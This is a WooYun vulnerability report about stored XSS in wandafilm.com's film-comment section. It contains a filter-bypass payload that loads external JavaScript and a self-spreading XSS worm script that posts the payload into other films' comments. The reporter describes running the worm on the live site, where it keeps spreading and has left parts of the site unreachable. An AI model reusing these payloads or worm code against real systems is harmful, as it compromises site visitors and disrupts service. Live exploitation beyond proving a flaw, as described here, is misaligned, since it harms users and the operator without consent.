WooYun.org

漏洞存在于 电影的评论处，要加载js过滤规则挺严的！
先上payload：<img src=x onerror=$['get\123cript']('//20.rs') width=0>
对script 做了检测 于是便用js8 对S做了下编码
然后成功加载js :

再来看下xss平台上所收到的：

由于万达功能比较少 为了证明漏洞影响。。。于是我。。。。
又玩了次蠕虫，上代码：
var url="http://www.wandafilm.com/user/comment.do?m=addFilmComment";
var sendata = "filmId=20140507033232512405&commentContent=%3Cimg+src%3Dx+onerror%3D%24%5B'get\\123cript'%5D('%2F%2Fkm3.pw')+width%3D0%3E&cmType=0&code=";
if (window.XMLHttpRequest){
var xmlhttp1=new XMLHttpRequest();
}
else{
var xmlhttp1=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp1.open("POST",url,true);
xmlhttp1.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xmlhttp1.send(sendata);
把filmId 的值替换成 想要蔓延过去的电影ID的值 就可以蔓延到另外一个电影。。。 为了减少影响范围 我只对20140507033232512405 20140707102851445844 这两部电影蠕了
来看看现在蠕了多少次了：

现在在持续增长中，目前已出现区域性无法访问：

漏洞地址在这里：
http://www.wandafilm.com/baseInfo/film/film_info_init_hot_20140507033232512405.html
http://www.wandafilm.com/baseInfo/film/film_info_init_hot_20140707102851445844.html
赶快确认吧 我好删除js！